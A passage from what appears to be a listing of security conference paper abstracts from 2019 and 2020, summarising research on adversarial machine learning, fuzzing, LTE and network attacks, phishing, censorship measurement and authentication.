Adversarial examples that fool machine learning models, particularly deep neural networks, have been a topic of intense research interest, with attacks and defenses being developed in a tight back-and-forth. Most past defenses are best effort and have been shown to be vulnerable to sophisticated attacks. Recently a set of certified defenses have been introduced, which provide guarantees of robustness to norm-bounded attacks. However these defenses either do not scale to large datasets or are limited in the types of models they can support. This paper presents the first certified defense that both scales to large networks and datasets (such as Google’s Inception network for ImageNet) and applies broadly to arbitrary model types. Our defense, called PixelDP, is based on a novel connection between robustness against adversarial examples and differential privacy, a cryptographically-inspired privacy formalism, that provides a rigorous, generic, and flexible foundation for defense.

DeepSec: A Uniform Platform for Security Analysis of Deep Learning Models

Deep learning (DL) models are inherently vulnerable to adversarial examples – maliciously crafted inputs to trigger target DL models to misbehave – which significantly hinders the application of DL in security-sensitive domains. Intensive research on adversarial learning has led to an arms race between adversaries and defenders. Such plethora of emerging attacks and defenses raise many questions: Which attacks are more evasive, preprocessing-proof, or transferable? Which defenses are more effective, utility-preserving, or general? Are ensembles of multiple defenses more robust than individuals? Yet, due to the lack of platforms for comprehensive evaluation on adversarial attacks and defenses, these critical questions remain largely unsolved. In this paper, we present the design, implementation, and evaluation of DEEPSEC, a uniform platform that aims to bridge this gap. In its current implementation, DEEPSEC incorporates 16 state-of-the-art attacks with 10 attack utility metrics, and 13 state-of-the-art defenses with 5 defensive utility metrics. To our best knowledge, DEEPSEC is the first platform that enables researchers and practitioners to (i) measure the vulnerability of DL models, (ii) evaluate the effectiveness of various attacks/defenses, and (iii) conduct comparative studies on attacks/defenses in a comprehensive and informative manner. Leveraging DEEPSEC, we systematically evaluate the existing adversarial attack and defense methods, and draw a set of key findings, which demonstrate DEEPSEC’s rich functionality, such as (1) the trade-off between misclassification and imperceptibility is empirically confirmed; (2) most defenses that claim to be universally applicable can only defend against limited types of attacks under restricted settings; (3) it is not necessary that adversarial examples with higher perturbation magnitude are easier to be detected; (4) the ensemble of multiple defenses cannot improve the overall defense capability, but can improve the lower bound of the defense effectiveness of individuals. Extensive analysis on DEEPSEC demonstrates its capabilities and advantages as a benchmark platform which can benefit future adversarial learning research.

Exploiting Unintended Feature Leakage in Collaborative Learning

Collaborative machine learning and related techniques such as federated learning allow multiple participants, each with his own training dataset, to build a joint model by training locally and periodically exchanging model updates.
We demonstrate that these updates leak unintended information about participants’ training data and develop passive and active inference attacks to exploit this leakage. First, we show that an adversarial participant can infer the presence of exact data points – for example, specific locations – in others’ training data (i.e., membership inference). Then, we show how this adversary can infer properties that hold only for a subset of the training data and are independent of the properties that the joint model aims to capture. For example, he can infer when a specific person first appears in the photos used to train a binary gender classifier.
We evaluate our attacks on a variety of tasks, datasets, and learning configurations, analyze their limitations, and discuss possible defenses.

Neural Cleanse: Identifying and Mitigating Backdoor Attacks in Neural Networks

Lack of transparency in deep neural networks (DNNs) make them susceptible to backdoor attacks, where hidden associations or triggers override normal classification to produce unexpected results. For example, a model with a
backdoor always identifies a face as Bill Gates if a specific symbol is present in the input. Backdoors can stay hidden indefinitely until activated by an input, and present a serious security risk to many security or safety related applications, e.g. biometric authentication systems or self-driving cars.

We present the first robust and generalizable detection and mitigation system for DNN backdoor attacks. Our techniques identify backdoors and reconstruct possible triggers. We identify multiple mitigation techniques via input filters, neuron pruning and unlearning. We demonstrate their efficacy via extensive experiments on a variety of DNNs, against two types of backdoor injection methods identified by prior work. Our techniques also prove robust against a number of variants of the backdoor attack.

Helen: Maliciously Secure Coopetitive Learning for Linear Models

Many organizations wish to collaboratively train machine learning models on their combined datasets for a common benefit (e.g., better medical research, or fraud detection). However, they often cannot share their plaintext datasets due to privacy concerns and/or business competition. In this paper, we design and build Helen, a system that allows multiple parties to train a linear model without revealing their data, a setting we call coopetitive learning. Compared to prior secure training systems, Helen protects against a much stronger adversary who is malicious and can compromise m−1 out of m parties. Our evaluation shows that Helen can achieve up to five orders of magnitude of performance improvement when compared to training using an existing state-of-the-art secure multi-party computation framework.

Comprehensive Privacy Analysis of Deep Learning

Deep neural networks are susceptible to various inference attacks as they remember information about their training data. We design white-box inference attacks to perform a comprehensive privacy analysis of deep learning models. We measure the privacy leakage through parameters of fully trained models as well as the parameter updates of models during training. We design inference algorithms for both centralized and federated learning, with respect to passive and active inference attackers, and assuming different adversary prior knowledge. We evaluate our novel white-box membership inference attacks against deep learning algorithms to trace their training data records. We show that a straightforward extension of the known black-box attacks to the white-box setting (through analyzing the outputs of activation functions) is ineffective. We therefore design new algorithms tailored to the white-box setting by exploiting the privacy vulnerabilities of the stochastic gradient descent algorithm, which is the algorithm used to train deep neural networks. We investigate the reasons why deep learning models may leak information about their training data. We then show that even well-generalized models are significantly susceptible to white-box membership inference attacks, by analyzing state-of-the-art pre-trained and publicly available models for the CIFAR dataset. We also show how adversarial participants, in the federated learning setting, can successfully run active membership inference attacks against other participants, even when the global model achieves high prediction accuracies.

Session 9: Fuzzing

Razzer: Finding Kernel Race Bugs through Fuzzing

A data race in a kernel is an important class of bugs, critically impacting the reliability and security of the associated system. As a result of a race, the kernel may become unresponsive. Even worse, an attacker may launch a privilege escalation attack to acquire root privileges.
In this paper, we propose Razzer, a tool to find race bugs in kernels. The core of Razzer is in guiding fuzz testing towards potential data race spots in the kernel. Razzer employs two techniques to find races efficiently: a static analysis and a deterministic thread interleaving technique. Using a static analysis, Razzer identifies over-approximated potential data race spots, guiding the fuzzer to search for data races in the kernel more efficiently. Using the deterministic thread interleaving technique implemented at the hypervisor, Razzer tames the non-deterministic behavior of the kernel such that it can deterministically trigger a race. We implemented a prototype of Razzer and ran the latest Linux kernel (from v4.16-rc3 to v4.18-rc3) using Razzer. As a result, Razzer discovered 30 new races in the kernel, with 16 subsequently confirmed and accordingly patched by kernel developers after they were reported.

ProFuzzer: On-the-fly Input Type Probing for Better Zero-day Vulnerability Discovery

Existing mutation based fuzzers tend to randomly mutate the input of a program without understanding its underlying syntax and semantics. In this paper, we propose a novel on-the-fly probing technique (called ProFuzzer) that automatically recovers and understands input fields of critical importance to vulnerability discovery during a fuzzing process and intelligently adapts the mutation strategy to enhance the chance of hitting zero-day targets. Since such probing is transparently piggybacked to the regular fuzzing, no prior knowledge of the input specification is needed. During fuzzing, individual bytes are first mutated and their fuzzing results are automatically analyzed to link those related together and identify the type for the field connecting them; these bytes are further mutated together following type-specific strategies, which substantially prunes the search space. We define the probe types generally across all applications, thereby making our technique application agnostic. Our experiments on standard benchmarks and real-world applications show that ProFuzzer substantially outperforms AFL and its optimized version AFLFast, as well as other state-of-art fuzzers including VUzzer, Driller and QSYM. Within two months, it exposed 42 zero-days in 10 intensively tested programs, generating 30 CVEs.

Full-speed Fuzzing: Reducing Fuzzing Overhead through Coverage-guided Tracing

Coverage-guided fuzzing is one of the most successful approaches for discovering software bugs and security vulnerabilities. Of its three main components: (1) test case generation, (2) code coverage tracing, and (3) crash triage, code coverage tracing is a dominant source of overhead. Coverage-guided fuzzers trace every test case’s code coverage through either static or dynamic binary instrumentation, or more recently, using hardware support. Unfortunately, tracing all test cases incurs significant performance penalties–-even when the overwhelming majority of test cases and their coverage information are discarded because they do not increase code coverage. To eliminate needless tracing by coverage-guided fuzzers, we introduce the notion of coverage-guided tracing. Coverage-guided tracing leverages two observations: (1) only a fraction of generated test cases increase coverage, and thus require tracing; and (2) coverage-increasing test cases become less frequent over time. Coverage-guided tracing encodes the current frontier of coverage in the target binary so that it self-reports when a test case produces new coverage–-without tracing. This acts as a filter for tracing; restricting the expense of tracing to only coverage-increasing test cases. Thus, coverage-guided tracing trades increased time handling coverage-increasing test cases for decreased time handling non-coverage-increasing test cases. To show the potential of coverage-guided tracing, we create an implementation based on the static binary instrumentor Dyninst called UnTracer. We evaluate UnTracer using eight real-world binaries commonly used by the fuzzing community. Experiments show that after only an hour of fuzzing, UnTracer’s average overhead is below 1%, and after 24-hours of fuzzing, UnTracer approaches 0% overhead, while tracing every test case with popular white- and black-box-binary tracers AFL-Clang, AFL-QEMU, and AFL-Dyninst incurs overheads of 36%, 612%, and 518%, respectively. We further integrate UnTracer with the state-of-the-art hybrid fuzzer QSYM and show that in 24-hours of fuzzing, QSYM-UnTracer executes 79% and 616% more test cases than QSYM-Clang and QSYM-QEMU, respectively.

NEUZZ: Efficient Fuzzing with Neural Program Smoothing

Fuzzing has become the de facto standard technique for finding software vulnerabilities. However, even state-of-the-art fuzzers are not very efficient at finding hard-to-trigger software bugs. Most popular fuzzers use evolutionary guidance to generate inputs that can trigger different bugs. Such evolutionary algorithms, while fast and simple to implement, often get stuck in fruitless sequences of random mutations. Gradient-guided optimization presents a promising alternative to evolutionary guidance. Gradient-guided techniques have been shown to significantly outperform evolutionary algorithms at solving high-dimensional structured optimization problems in domains like machine learning by efficiently utilizing gradients or higher-order derivatives of the underlying function.

However, gradient-guided approaches are not directly applicable to fuzzing as real-world program behaviors contain many discontinuities, plateaus, and ridges where the gradient-based methods often get stuck. We observe that this problem can be addressed by creating a smooth surrogate function approximating the target program’s discrete branching behavior. In this paper, we propose a novel program smoothing technique using surrogate neural network models that can incrementally learn smooth approximations of a complex, real-world program’s branching behaviors. We further demonstrate that such neural network models can be used together with gradient-guided input generation schemes to significantly increase the efficiency of the fuzzing process.

Our extensive evaluations demonstrate that NEUZZ significantly outperforms 10 state-of-the-art graybox fuzzers on 10 popular real-world programs both at finding new bugs and achieving higher edge coverage. NEUZZ found 31 previously unknown bugs (including two CVEs) that other fuzzers failed to find in 10 real-world programs and achieved 3X more edge coverage than all of the tested graybox fuzzers over 24 hour runs. Furthermore, NEUZZ also outperformed existing fuzzers on both LAVA-M and DARPA CGC bug datasets.

Fuzzing File Systems via Two-Dimensional Input Space Exploration

File systems, a basic building block of an OS, are too big and too complex to be bug free. Nevertheless, file systems rely on regular stress-testing tools and formal checkers to find bugs, which are limited due to the ever-increasing complexity of both file systems and OSes. Thus, fuzzing, proven to be an effective and a practical approach, becomes a preferable choice, as it does not need much knowledge about a target. However, three main challenges exist in fuzzing file systems: mutating a large image blob that degrades overall performance, generating image-dependent file operations, and reproducing found bugs, which is difficult for existing OS fuzzers.
Hence, we present JANUS, the first feedback-driven fuzzer that explores the two-dimensional input space of a file system, i.e., mutating metadata on a large image, while emitting image-directed file operations. In addition, JANUS relies on a library OS rather than on traditional VMs for fuzzing, which enables JANUS to load a fresh copy of the OS, thereby leading to better reproducibility of bugs. We evaluate JANUS on eight file systems and found 90 bugs in the upstream Linux kernel, 62 of which have been acknowledged. Forty-three bugs have been fixed with 32 CVEs assigned. In addition, JANUS achieves higher code coverage on all the file systems after fuzzing 12 hours, when compared with the state-of-the-art fuzzer Syzkaller for fuzzing file systems. JANUS visits 4.19x and 2.01x more code paths in Btrfs and ext4, respectively. Moreover, JANUS is able to reproduce 88–100% of the crashes, while Syzkaller fails on all of them.

Session 13: Network Security

Breaking LTE on Layer Two

Long Term Evolution (LTE) is the latest mobile communication standard and has a pivotal role in our information society: LTE combines performance goals with modern security mechanisms and serves casual use cases as well as critical infrastructure and public safety communications. Both scenarios are demanding towards a resilient and secure specification and implementation of LTE, as outages and open attack vectors potentially lead to severe risks. Previous work on LTE protocol security identified crucial attack vectors for both the physical (layer one) and network (layer three) layers. Data link layer (layer two) protocols, however, remain a blind spot in existing LTE security research.
In this paper, we present a comprehensive layer two security analysis and identify three attack vectors. These attacks impair the confidentiality and/or privacy of LTE communication. More specifically, we first present a passive identity mapping attack that matches volatile radio identities to longer lasting network identities, enabling us to identify users within a cell and serving as a stepping stone for follow-up attacks. Second, we demonstrate how a passive attacker can abuse the resource allocation as a side channel to perform website fingerprinting that enables the attacker to learn the websites a user accessed. Finally, we present the A LTE R attack that exploits the fact that LTE user data is encrypted in counter mode (AES-CTR) but not integrity protected, which allows us to modify the message payload. As a proof-of-concept demonstration, we show how an active attacker can redirect DNS requests and then perform a DNS spoofing attack. As a result, the user is redirected to a malicious website. Our experimental analysis demonstrates the real-world applicability of all three attacks and emphasizes the threat of open attack vectors on LTE layer two protocols.

HOLMES: Real-time APT Detection through Correlation of Suspicious Information Flows

In this paper, we present HOLMES, a system that implements a new approach to the detection of Advanced and Persistent Threats (APTs). HOLMES is inspired by several case studies of real-world APTs that highlight some common goals of APT actors. In a nutshell, HOLMES aims to produce a detection signal that indicates the presence of a coordinated set of activities that are part of an APT campaign. One of the main challenges addressed by our approach involves developing a suite of techniques that make the detection signal robust and reliable. At a high-level, the techniques we develop effectively leverage the correlation between suspicious information flows that arise during an attacker campaign. In addition to its detection capability, HOLMES is also able to generate a high-level graph that summarizes the attacker’s actions in real-time. This graph can be used by an analyst for an effective cyber response. An evaluation of our approach against some real-world APTs indicates that HOLMES can detect APT campaigns with high precision and low false alarm rate. The compact high-level graphs produced by HOLMES effectively summarizes an ongoing attack campaign and can assist real-time cyber-response operations.

Touching the Untouchables: Dynamic Security Analysis of the LTE Control Plane

This paper presents our extensive investigation of the security aspects of control plane procedures based on dynamic testing of the control components in operational Long Term Evolution (LTE) networks. For dynamic testing in LTE networks, we implemented a semi-automated testing tool, named LTEFuzz, by using open-source LTE software over which the user has full control. We systematically generated test cases by defining three basic security properties by closely analyzing the standards. Based on the security property, LTEFuzz generates and sends the test cases to a target network, and classifies the problematic behavior by only monitoring the device-side logs. Accordingly, we uncovered 36 vulnerabilities, which have not been disclosed previously. These findings are categorized into five types: Improper handling of (1) unprotected initial procedure, (2) crafted plain requests, (3) messages with invalid integrity protection, (4) replayed messages, and (5) security procedure bypass. We confirmed those vulnerabilities by demonstrating proof-of-concept attacks against operational LTE networks. The impact of the attacks is to either deny LTE services to legitimate users, spoof SMS messages, or eavesdrop/manipulate user data traffic. Precise root cause analysis and potential countermeasures to address these problems are presented as well. Cellular carriers were partially involved to maintain ethical standards as well as verify our findings in commercial LTE networks.

On the Feasibility of Rerouting-Based DDoS Defenses

Large botnet-based flooding attacks have recently demonstrated unprecedented damage. However, the best-known end-to-end availability guarantees against flooding attacks require costly global-scale coordination among autonomous systems (ASes). A recent proposal called routing around congestion (or RAC) attempts to offer strong end-to-end availability to a selected critical flow by dynamically rerouting it to an uncongested detour path without requiring any inter-AS coordination. This paper presents an in-depth analysis of the (in)feasibility of the RAC defense and points out that its rerouting approach, though intriguing, cannot possibly solve the challenging flooding problem. An effective RAC solution should find an inter-domain detour path for its critical flow with the two following desired properties: (1) it guarantees the establishment of an arbitrary detour path of its choice, and (2) it isolates the established detour path from non-critical flows so that the path is used exclusively for its critical flow. However, we show a fundamental trade-off between the two desired properties, and as a result, only one of them can be achieved but not both. Worse yet, we show that failing to achieve either of the two properties makes the RAC defense not just ineffective but nearly unusable. When the newly established detour path is not isolated, a new adaptive adversary can detect it in real time and immediately congest the path, defeating the goals of the RAC defense. Conversely, when the establishment of an arbitrary detour path is not guaranteed, more than 80% of critical flows we test have only a small number (e.g., three or less) of detour paths that can actually be established and disjoint from each other, which significantly restricts the available options for the reliable RAC operation. The first lesson of this study is that BGP-based rerouting solutions in the current inter-domain infrastructure seem to be impractical due to implicit assumptions (e.g., the invisibility of poisoning messages) that are unattainable in BGP’s current practice. Second, we learn that the analysis of protocol specifications alone is insufficient for the feasibility study of any new defense proposal and, thus, additional rigorous security analysis and various network evaluations, including real-world testing, are required. Finally, our findings in this paper agree well with the conclusion of the major literature about end-to-end guarantees; that is, strong end-to-end availability should be a security feature of the Internet routing by design, not an ad hoc feature obtained via exploiting current routing protocols.

Resident Evil: Understanding Residential IP Proxy as a Dark Service

An emerging Internet business is residential proxy (RESIP) as a service, in which a provider utilizes the hosts within residential networks (in contrast to those running in a datacenter) to relay their customers’ traffic, in an attempt to avoid server- side blocking and detection. With the prominent roles the services could play in the underground business world, little has been done to understand whether they are indeed involved in Cybercrimes and how they operate, due to the challenges in identifying their RESIPs, not to mention any in-depth analysis on them.
In this paper, we report the first study on RESIPs, which sheds light on the behaviors and the ecosystem of these elusive gray services. Our research employed an infiltration framework, including our clients for RESIP services and the servers they visited, to detect 6 million RESIP IPs across 230+ countries and 52K+ ISPs. The observed addresses were analyzed and the hosts behind them were further fingerprinted using a new profiling system. Our effort led to several surprising findings about the RESIP services unknown before. Surprisingly, despite the providers’ claim that the proxy hosts are willingly joined, many proxies run on likely compromised hosts including IoT devices. Through cross-matching the hosts we discovered and labeled PUP (potentially unwanted programs) logs provided by a leading IT company, we uncovered various illicit operations RESIP hosts performed, including illegal promotion, Fast fluxing, phishing, malware hosting, and others. We also reverse engi- neered RESIP services’ internal infrastructures, uncovered their potential rebranding and reselling behaviors. Our research takes the first step toward understanding this new Internet service, contributing to the effective control of their security risks.

Session 15: Web and Cloud Security

Why Does Your Data Leak? Uncovering the Data Leakage in Cloud from Mobile Apps

Increasingly, more and more mobile applications (apps for short) are using the cloud as the back-end, in particular the cloud APIs, for data storage, data analytics, message notification, and monitoring. Unfortunately, we have recently witnessed massive data leaks from the cloud, ranging from personally identifiable information to corporate secrets. In this paper, we seek to understand why such significant leaks occur and design tools to automatically identify them. To our surprise, our study reveals that lack of authentication, misuse of various keys (e.g., normal user keys and superuser keys) in authentication, or misconfiguration of user permissions in authorization are the root causes. Then, we design a set of automated program analysis techniques including obfuscation-resilient cloud API identification and string value analysis, and implement them in a tool called LeakScope to identify the potential data leakage vulnerabilities from mobile apps based on how the cloud APIs are used. Our evaluation with over 1.6 million mobile apps from the Google Play Store has uncovered 15, 098 app servers managed by mainstream cloud providers such as Amazon, Google, and Microsoft that are subject to data leakage attacks. We have made responsible disclosure to each of the cloud service providers, and they have all confirmed the vulnerabilities we have identified and are actively working with the mobile app developers to patch their vulnerable services.

Measuring and Analyzing Search Engine Poisoning of Linguistic Collisions

Misspelled keywords have become an appealing target in search poisoning, since they are less competitive to promote than the correct queries and account for a considerable amount of search traffic. Search engines have adopted several countermeasure strategies, e.g., Google applies automated corrections on queried keywords and returns search results of the corrected versions directly. However, a sophisticated class of attack, which we term as linguistic-collision misspelling, can evade auto-correction and poison search results. Cybercriminals target special queries where the misspelled terms are existent words, even in other languages (e.g., “idobe”, a misspelling of the English word “adobe”, is a legitimate word in the Nigerian language).

In this paper, we perform the first large-scale analysis on linguistic-collision search poisoning attacks. In particular, we check 1.77 million misspelled search terms on Google and Baidu and analyze both English and Chinese languages, which are the top two languages used by Internet users. We leverage edit distance operations and linguistic properties to generate misspelling candidates. To more efficiently identify linguistic-collision search terms, we design a deep learning model that can improve collection rate by 2.84x compared to random sampling. Our results show that the abuse is prevalent: around 1.19% of linguistic-collision search terms on Google and Baidu have results on the first page directing to malicious websites. We also find that cybercriminals mainly target categories of gambling, drugs, and adult content. Mobile-device users disproportionately search for misspelled keywords, presumably due to small screen for input. Our work highlights this new class of search engine poisoning and provides insights to help mitigate the threat.

How Well Do My Results Generalize? Comparing Security and Privacy Survey Results from MTurk, Web, and Telephone Samples

Security and privacy researchers often rely on data collected from Amazon Mechanical Turk (MTurk) to evaluate security tools, to understand users’ privacy preferences and to measure online behavior. Yet, little is known about how well Turkers’ survey responses and performance on security- and privacy-related tasks generalizes to a broader population. This paper takes a first step toward understanding the generalizability of security and privacy user studies by comparing users’ self-reports of their security and privacy knowledge, past experiences, advice sources, and behavior across samples collected using MTurk (n=480), a census-representative web-panel (n=428), and a probabilistic telephone sample (n=3,000) statistically weighted to be accurate within 2.7% of the true prevalence in the U.S.

Surprisingly, the results suggest that: (1) MTurk responses regarding security and privacy experiences, advice sources, and knowledge are more representative of the U.S. population than are responses from the census-representative panel; (2) MTurk and general population reports of security and privacy experiences, knowledge, and advice sources are quite similar for respondents who are younger than 50 or who have some college education; and (3) respondents’ answers to the survey questions we ask are stable over time and robust to relevant, broadly-reported news events. Further, differences in responses cannot be ameliorated with simple demographic weighting, possibly because MTurk and panel participants have more internet experience compared to their demographic peers. Together, these findings lend tempered support for the generalizability of prior crowdsourced security and privacy user studies; provide context to more accurately interpret the results of such studies; and suggest rich directions for future work to mitigate experience- rather than demographic-related sample biases.

PhishFarm: A Scalable Framework for Measuring the Effectiveness of Evasion Techniques Against Browser Phishing Blacklists

Phishing attacks have reached record volumes in recent years. Simultaneously, modern phishing websites are growing in sophistication by employing diverse cloaking techniques to avoid detection by security infrastructure. In this paper, we present PhishFarm: a scalable framework for methodically testing the resilience of anti-phishing entities and browser blacklists to attackers’ evasion efforts. We use PhishFarm to deploy 2,380 live phishing sites (on new, unique, and previously-unseen .com domains) each using one of six different HTTP request filters based on real phishing kits. We reported subsets of these sites to 10 distinct anti-phishing entities and measured both the occurrence and timeliness of native blacklisting in major web browsers to gauge the effectiveness of protection ultimately extended to victim users and organizations. Our experiments revealed shortcomings in current infrastructure, which allows some phishing sites to go unnoticed by the security community while remaining accessible to victims. We found that simple cloaking techniques representative of real-world attacks— including those based on geolocation, device type, or JavaScript— were effective in reducing the likelihood of blacklisting by over 55% on average. We also discovered that blacklisting did not function as intended in popular mobile browsers (Chrome, Safari, and Firefox), which left users of these browsers particularly vulnerable to phishing attacks. Following disclosure of our findings, anti-phishing entities are now better able to detect and mitigate several cloaking techniques (including those that target mobile users), and blacklisting has also become more consistent between desktop and mobile platforms— but work remains to be done by anti-phishing entities to ensure users are adequately protected. Our PhishFarm framework is designed for continuous monitoring of the ecosystem and can be extended to test future state-of-the-art evasion techniques used by malicious websites.

2020 program dblp

Session #1: Anonymity and Censorship

ICLab: A Global, Longitudinal Internet Censorship Measurement Platform

Researchers have studied Internet censorship for nearly as long as attempts to censor contents have taken place. Most studies have however been limited to a short period of time and / or a few countries; the few exceptions have traded off detail for breadth of coverage. Collecting enough data for a comprehensive, global, longitudinal perspective remains challenging.In this work, we present ICLab, an Internet measurement platform specialized for censorship research. It achieves a new balance between breadth of coverage and detail of measurements, by using commercial VPNs as vantage points distributed around the world. ICLab has been operated continuously since late 2016. It can currently detect DNS manipulation and TCP packet injection, and overt “block pages” however they are delivered. ICLab records and archives raw observations in detail, making retrospective analysis with new techniques possible. At every stage of processing, ICLab seeks to minimize false positives and manual validation.Within 53,906,532 measurements of individual web pages, collected by ICLab in 2017 and 2018, we observe blocking of 3,602 unique URLs in 60 countries. Using this data, we compare how different blocking techniques are deployed in different regions and/or against different types of content. Our longitudinal monitoring pinpoints changes in censorship in India and Turkey concurrent with political shifts, and our clustering techniques discover 48 previously unknown block pages. ICLab’s broad and detailed measurements also expose other forms of network interference, such as surveillance and malware injection.

High Precision Open-World Website Fingerprinting

Traffic analysis attacks to identify which web page a client is browsing, using only her packet metadata — known as website fingerprinting (WF) — has been proven effective in closed-world experiments against privacy technologies like Tor. We want to investigate their usefulness in the real open world. Several WF attacks claim to have high recall and low false positive rate, but they have only been shown to succeed against high base rate pages. We explicitly incorporate the base rate into precision and call it r-precision. Using this metric, we show that the best previous attacks have poor precision when the base rate is realistically low; we study such a scenario (r = 1000), where the maximum r-precision achieved was only 0.14.To improve r-precision, we propose three novel classes of precision optimizers that can be applied to any classifier to increase precision. For r = 1000, our best optimized classifier can achieve a precision of at least 0.86, representing a precision increase by more than 6 times. For the first time, we show a WF classifier that can scale to any open world set size. We also investigate the use of precise classifiers to tackle realistic objectives in website fingerprinting, including different types of websites, identification of sensitive clients, and defeating website fingerprinting defenses.

Breaking and (Partially) Fixing Provably Secure Onion Routing

After several years of research on onion routing, Camenisch and Lysyanskaya, in an attempt at rigorous analysis, defined an ideal functionality in the universal composability model, together with properties that protocols have to meet to achieve provable security. A whole family of systems based their security proofs on this work. However, analyzing HORNET and Sphinx, two instances from this family, we show that this proof strategy is broken. We discover a previously unknown vulnerability that breaks anonymity completely, and explain a known one. Both should not exist if privacy is proven correctly.In this work, we analyze and fix the proof strategy used for this family of systems. After proving the efficacy of the ideal functionality, we show how the original properties are flawed and suggest improved, effective properties in their place. Finally, we discover another common mistake in the proofs. We demonstrate how to avoid it by showing our improved properties for one protocol, thus partially fixing the family of provably secure onion routing protocols.

Are Anonymity-Seekers Just Like Everybody Else? An Analysis of Contributions to Wikipedia from Tor

User-generated content sites routinely block contributions from users of privacy-enhancing proxies like Tor because of a perception that proxies are a source of vandalism, spam, and abuse. Although these blocks might be effective, collateral damage in the form of unrealized valuable contributions from anonymity seekers is invisible. One of the largest and most important user-generated content sites, Wikipedia, has attempted to block contributions from Tor users since as early as 2005. We demonstrate that these blocks have been imperfect and that thousands of attempts to edit on Wikipedia through Tor have been successful. We draw upon several data sources and analytical techniques to measure and describe the history of Tor editing on Wikipedia over time and to compare contributions from Tor users to those from other groups of Wikipedia users. Our analysis suggests that although Tor users who slip through Wikipedia’s ban contribute content that is more likely to be reverted and to revert others, their contributions are otherwise similar in quality to those from other unregistered participants and to the initial contributions of registered users.

Session #2: Authentication

Gesture Authentication for Smartphones: Evaluation of Gesture Password Selection Policies

Touchscreen gestures are attracting research attention as an authentication method. While studies have showcased their usability, it has proven more complex to determine, let alone enhance, their security. Problems stem both from the small scale of current data sets and the fact that gestures are matched imprecisely – by a distance metric. This makes it challenging to assess entropy with traditional algorithms. To address these problems, we captured a large set of gesture passwords (N=2594) from crowd workers, and developed a security assessment framework that can calculate partial guessing entropy estimates, and generate dictionaries that crack 23.13% or more gestures in online attacks (within 20 guesses). To improve the entropy of gesture passwords, we designed novel blacklist and lexical policies to, respectively, restrict and inspire gesture creation. We close by validating both our security assessment framework and policies in a new crowd-sourced study (N=4000). Our blacklists increase entropy and resistance to dictionary based guessing attacks.

Is FIDO2 the Kingslayer of User Authentication? A Comparative Usability Study of FIDO2 Passwordless Authentication

The newest contender for succeeding passwords as the incumbent web authentication scheme is the FIDO2 standard. Jointly developed and backed by the FIDO Alliance and the W3C, FIDO2 has found support in virtually every browser, finds increasing support by service providers, and has adoptions beyond browser-software on its way. While it supports MFA and 2FA, its single-factor, passwordless authentication with security tokens has received the bulk of attention and was hailed by its supporters and the media as the solution that will replace text-passwords on the web. Despite its obvious security and deployability benefits—a setting that no prior solution had in this strong combination—the paradigm shift from a familiar knowledge factor to purely a possession factor raises questions about the acceptance of passwordless authentication by end-users.This paper presents the first large-scale lab study of FIDO2 single-factor authentication to collect insights about end-users’ perception, acceptance, and concerns about passwordless authentication. Through hands-on tasks our participants gather first-hand experience with passwordless authentication using a security key, which they afterwards reflect on in a survey. Our results show that users are willing to accept a direct replacement of text-based passwords with a security key for single-factor authentication. That is an encouraging result in the quest to replace passwords. But, our results also identify new concerns that can potentially hinder the widespread adoption of FIDO2 passwordless authentication. In order to mitigate these factors, we derive concrete recommendations to try to help in the ongoing proliferation of passwordless authentication on the web.

This PIN Can Be Easily Guessed: Analyzing the Security of Smartphone Unlock PINs

In this paper, we provide the first comprehensive study of user-chosen 4- and 6-digit PINs (n = 1220) collected on smartphones with participants being explicitly primed for device unlocking. We find that against a throttled attacker (with 10, 30, or 100 guesses, matching the smartphone unlock setting), using 6-digit PINs instead of 4-digit PINs provides little to no increase in security, and surprisingly may even decrease security. We also study the effects of blacklists, where a set of “easy to guess” PINs is disallowed during selection. Two such blacklists are in use today by iOS, for 4-digits (274 PINs) as well as 6-digits (2910 PINs). We extracted both blacklists compared them with four other blacklists, including a small 4-digit (27 PINs), a large 4-digit (2740 PINs), and two placebo blacklists for 4- and 6-digit PINs that always excluded the first-choice PIN. We find that relatively small blacklists in use today by iOS offer little or no benefit against a throttled guessing attack. Security gains are only observed when the blacklists are much larger, which in turn comes at the cost of increased user frustration. Our analysis suggests that a blacklist at about 10 % of the PIN space may provide the best balance between usability and security.

Session #2: Machine Learning and Privacy

The Value of Collaboration in Convex Machine Learning with Differential Privacy

In this paper, we apply machine learning to distributed private data owned by multiple data owners, entities with access to non-overlapping training datasets. We use noisy, differentially-private gradients to minimize the fitness cost of the machine learning model using stochastic gradient descent. We quantify the quality of the trained model, using the fitness cost, as a function of privacy budget and size of the distributed datasets to capture the trade-off between privacy and utility in machine learning. This way, we can predict the outcome of collaboration among privacy-aware data owners prior to executing potentially computationally-expensive machine learning algorithms. Particularly, we show that the difference between the fitness of the trained machine learning model using differentially-private gradient queries and the fitness of the trained machine model in the absence of any privacy concerns is inversely proportional to the size of the training datasets squared and the privacy budget squared. We successfully validate the performance prediction with the actual performance of the proposed privacy-aware learning algorithms, applied to: financial datasets for determining interest rates of loans using regression; and detecting credit card frauds using support vector machines.

Automatically Detecting Bystanders in Photos to Reduce Privacy Risks

Photographs taken in public places often contain bystanders - people who are not the main subject of a photo. These photos, when shared online, can reach a large number of viewers and potentially undermine the bystanders’ privacy. Furthermore, recent developments in computer vision and machine learning can be used by online platforms to identify and track individuals. To combat this problem, researchers have proposed technical solutions that require bystanders to be proactive and use specific devices or applications to broadcast their privacy policy and identifying information to locate them in an image.We explore the prospect of a different approach – identifying bystanders solely based on the visual information present in an image. Through an online user study, we catalog the rationale humans use to classify subjects and bystanders in an image, and systematically validate a set of intuitive concepts (such as intentionally posing for a photo) that can be used to automatically identify bystanders. Using image data, we infer those concepts and then use them to train several classifier models. We extensively evaluate the models and compare them with human raters. On our initial dataset, with a 10-fold cross validation, our best model achieves a mean detection accuracy of 93% for images when human raters have 100% agreement on the class label and 80% when the agreement is only 67%. We validate this model on a completely different dataset and achieve similar results, demonstrating that our model generalizes well.

CrypTFlow : Secure TensorFlow Inference

